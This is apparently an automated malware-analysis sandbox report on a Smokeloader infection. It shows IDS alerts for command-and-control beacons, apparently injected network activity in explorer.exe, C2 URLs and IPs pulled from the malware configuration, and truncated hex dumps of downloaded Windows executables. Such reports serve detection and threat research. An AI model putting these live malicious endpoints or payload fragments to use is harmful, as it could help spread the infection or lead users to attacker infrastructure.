Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49744 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49755 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49753 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49758 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.7:49758 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49760 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.7:49760 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49747 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.7:49747 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49762 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49764 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49766 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49768 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49772 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.7:49772 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49770 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49778 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49774 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49779 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.7:49762 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49781 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.7:49781 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49776 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49787 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49785 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.7:49785 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49783 -> 46.100.50.5:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.7:49783 -> 46.100.50.5:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 46.100.50.5 80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: Malware configuration extractor	URLs: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: Malware configuration extractor	URLs: http://yosoborno.com/tmp/
Source: Malware configuration extractor	URLs: http://wshcnsd.xyz/tmp/
Source: Malware configuration extractor	URLs: http://nusdhj.ws/tmp/
Source: Malware configuration extractor	IPs: 185.215.113.16
Source: Malware configuration extractor	URLs: vs.top
Source: Malware configuration extractor	URLs: @fivexx5vs.top
Source: Malware configuration extractor	URLs: xx5vs.top
Source: Malware configuration extractor	URLs: `vfivexx5vs.top
Source: Malware configuration extractor	URLs: fivexx5vs.top
Source: Malware configuration extractor	URLs: s.top
Source: Malware configuration extractor	URLs: analforeverlovyu.top
Source: Malware configuration extractor	URLs: 95.179.163.21:29257

Source: global traffic	TCP traffic: 192.168.2.7:49728 -> 95.179.163.21:29257
Source: global traffic	TCP traffic: 192.168.2.7:49729 -> 65.21.18.51:45580
Source: global traffic	TCP traffic: 192.168.2.7:49748 -> 62.113.117.95:4449

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 26 Aug 2024 21:29:09 GMTContent-Type: application/octet-streamContent-Length: 330792Last-Modified: Sun, 18 Aug 2024 13:17:05 GMTConnection: keep-aliveETag: "66c1f451-50c28"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b3 ea c1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 dc 04 00 00 08 00 00 00 00 00 00 fe f9 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a8 f9 04 00 53 00 00 00 00 00 05 00 b0 05 00 00 00 00 00 00 00 00 00 00 00 e6 04 00 28 26 00 00 00 20 05 00 0c 00 00 00 70 f8 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 da 04 00 00 20 00 00 00 dc 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 05 00 00 00 00 05 00 00 06 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 f9 04 00 00 00 00 00 48 00 00 00 02 00 05 00 88 e9 04 00 e8 0e 00 00 03 00 02 00 0d 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 fc 23 bf f1 04 74 d4 ea 6a 0d 20 60 74 2d ee 19 b3 7a ff bf 80 fa a6 2d b1 0a c2 b6 8b 72 be 4e 12 cc 65 fb 6b f4 12 4d 58 77 b2 ce 61 97 62 6a 15 bf 1d d6 8e cf 9f c5 23 81 4f 9a 08 02 31 ab f7 24 0e aa b1 02 4f 55 95 80 da a1 c8 86 0b ee 81 2e e8 cc 5d 41 4d 0a c4 ea 4b 21 5d fd 2c de eb 5a ab 81 e9 1a f0 fb 82 e1 77 e4 c9 e5 52 e4 05 88 5e 23 93 55 1d d9 8c 28 f3 51 f5 44 7d 7a 92 08 e2 bf c3 17 99 6d 1c e1 84 93 83 5f 82 bc 20 22 1e 21 f1 0e 7a 9d 23 ca 37 39 dc 1a ee 79 bd 59 fd 32 9f 80 10 e0 ff e0 6c 63 94 05 e6 84 35 98 f2 3e b9 6c bf e7 86 93 ea 5b b3 8d 57 b4 49 b9 43 99 a2 10 d0 f3 d4 98 39 bf cc cb 46 6b 4a 91 a8 7d 0c 58 5f 58 b2 2a 22 00 ce f8 71 50 bf 34 07 89 80 70 08 58 22 c6 14 64 36 fd 26 11 a9 1c e6 5c c4 c0 b6 61 f5 b1 98 5d 22 13 54 76 3e 1f 40 17 85 47 49 63 f4 34 9a bc fd 50 db e1 1c 17 4a cd 9d 89 7a 6a ee 70 72 06 79 a4 72 81 2a d9 9a 66 48 88 0d 15 36 98 bb ab f6 c9 db eb 23 fd ee ed d7 dd 6b 71 7a 54 2b 1
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 26 Aug 2024 21:29:11 GMTContent-Type: application/octet-streamContent-Length: 1104936Last-Modified: Mon, 19 Aug 2024 12:56:48 GMTConnection: keep-aliveETag: "66c34110-10dc28"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5c 08 c3 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 ac 10 00 00 08 00 00 00 00 00 00 1e ca 10 00 00 20 00 00 00 e0 10 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 11 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc c9 10 00 4f 00 00 00 00 e0 10 00 b0 05 00 00 00 00 00 00 00 00 00 00 00 b6 10 00 28 26 00 00 00 00 11 00 0c 00 00 00 94 c8 10 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 aa 10 00 00 20 00 00 00 ac 10 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 05 00 00 00 e0 10 00 00 06 00 00 00 ae 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 11 00 00 02 00 00 00 b4 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ca 10 00 00 00 00 00 48 00 00 00 02 00 05 00 90 b9 10 00 04 0f 00 00 03 00 02 00 0d 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9a 0d ac 93 4c e6 76 fa 6c 54 10 70 23 8b 45 05 b2 27 26 c8 c4 40 63 43 04 ce d8 74 45 d1 ab 91 c8 04 c9 25 20 0b eb 83 e8 84 70 72 2a 51 41 b8 55 ea 76 36 0f d5 56 c6 3d 18 43 78 96 1c 47 15 48 f2 45 8b cf 1b b3 de 69 85 85 82 04 c7 a1 28 68 68 c6 71 c4 82 42 66 0c c0 7d c6 b9 05 a5 67 4c 2d 17 53 a8 31 29 2c 70 98 e0 aa c4 d7 e7 ae b6 24 94 38 f0 69 6a 33 0e 1b b9 fb e0 37 d3 b3 fc ab 07 21 54 73 8c c9 9f df cf ec 18 54 a7 5b 89 c7 0a 58 aa b0 50 55 45 a5 63 d0 b8 6a 0a 1e c5 b5 73 ca be 5d 1c 45 fc f5 9b 1d f7 00 94 00 71 fb 58 80 77 73 53 c7 59 bb 8e ad ae 67 29 fa d9 e7 1a f3 9c f5 37 49 aa fe ee 4f 4b af 09 6d 28 13 86 64 1f 28 bd 54 ca de cb b3 81 b4 13 07 1b 30 60 c0 56 60 01 b3 00 6f bb b4 9a dd ac 45 17 47 9e ca 0e 23 05 49 09 f0 71 13 a0 14 ed c2 6c 68 39 9c f1 2b d5 fb 00 e4 ba 12 8b 08 9a 3e 36 51 8b e1 3d d8 53 20 d3 f4 14 b3 c3 ed 05 ad c0 b5 b1 2d 89 f5 dc ff 23 d5 d2 5d 90 01 c3 02 14 88 0e 72 41 cb 52 1e 9e 8b 0d 90
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 26 Aug 2024 21:29:14 GMTContent-Type: application/octet-streamContent-Length: 358912Last-Modified: Fri, 23 Aug 2024 11:05:54 GMTConnection: keep-aliveETag: "66c86d12-57a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 b4 77 04 ec d5 19 57 ec d5 19 57 ec d5 19 57 83 a3 b2 57 f4 d5 19 57 83 a3 87 57 fc d5 19 57 83 a3 b3 57 ba d5 19 57 e5 ad 8a 57 eb d5 19 57 ec d5 18 57 68 d5 19 57 83 a3 b6 57 ed d5 19 57 83 a3 83 57 ed d5 19 57 83 a3 84 57 ed d5 19 57 52 69 63 68 ec d5 19 57 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d1 71 4f 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 7c 03 00 00 2c 1b 00 00 00 00 00 38 45 00 00 00 10 00 00 00 90 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 1e 00 00 04 00 00 e2 6b 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 7e 03 00 50 00 00 00 00 20 1e 00 18 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 7f 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 31 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 f4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 7a 03 00 00 10 00 00 00 7c 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a0 81 1a 00 00 90 03 00 00 76 01 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 18 83 00 00 00 20 1e 00 00 84 00 00 00 f6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 26 Aug 2024 21:29:17 GMTContent-Type: application/octet-streamContent-Length: 192000Last-Modified: Sat, 24 Aug 2024 14:58:01 GMTConnection: keep-aliveETag: "66c9f4f9-2ee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 98 e0 c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 90 64 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 a9 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 23 00 80 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4a c6 01 00 00 10 00 00 00 c8 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 ee ce 00 00 00 e0 01 00 00 d0 00 00 00 cc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 94 2b 21 00 00 b0 02 00 00 0c 00 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2a 44 00 00 00 e0 23 00 00 46 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 26 Aug 2024 21:29:19 GMTContent-Type: application/octet-streamContent-Length: 6573502Last-Modified: Sun, 25 Aug 2024 12:35:23 GMTConnection: keep-aliveETag: "66cb250b-644dbe"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 06 9e ca 66 00 44 5e 00 ce 24 00 00 e0 00 06 01 0b 01 02 23 00 34 47 00 00 96 59 00 00 e4 66 00 b0 14 00 00 00 10 00 00 00 50 47 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 e0 c5 00 00 06 00 00 5a 4a 65 00 02 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 90 b2 00 42 00 00 00 00 a0 b2 00 e4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 b2 00 d4 20 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 fe 47 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 a1 b2 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 33 47 00 00 10 00 00 00 34 47 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 68 13 00 00 00 50 47 00 00 14 00 00 00 3a 47 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 38 a0 00 00 00 70 47 00 00 a2 00 00 00 4e 47 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2f 34 00 00 00 00 00 00 88 79 03 00 00 20 48 00 00 7a 03 00 00 f0 47 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 54 e2 66 00 00 a0 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 42 00 00 00 00 90 b2 00 00 02 00 00 00 6a 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 e4 09 00 00 00 a0 b2 00 00 0a 00 00 00 6c 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 34 00 00 00 00 b0 b2 00 00 02 00 00 00 76 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 c0 b2 00 00 02 00 00 00 78 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 d4 20 0e 00 00 d0 b2 00 00 22 0e 00 00 7a 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 31 34 00 00 00 00 00 90 06 00 00 00 00 c1 00 00 08 00 00 00 9c 59 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 32 39 00 00 00 00 00 c4 a7 01 00 00 10 c1 00 00 a8 01 00 00 a4 59 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 31 00 00 00 00 00 58 4c 00 00 00 c0 c2 00 00 4e 00 00 00 4c 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 35 00 00 00 00 00 42 e3 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 26 Aug 2024 21:29:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 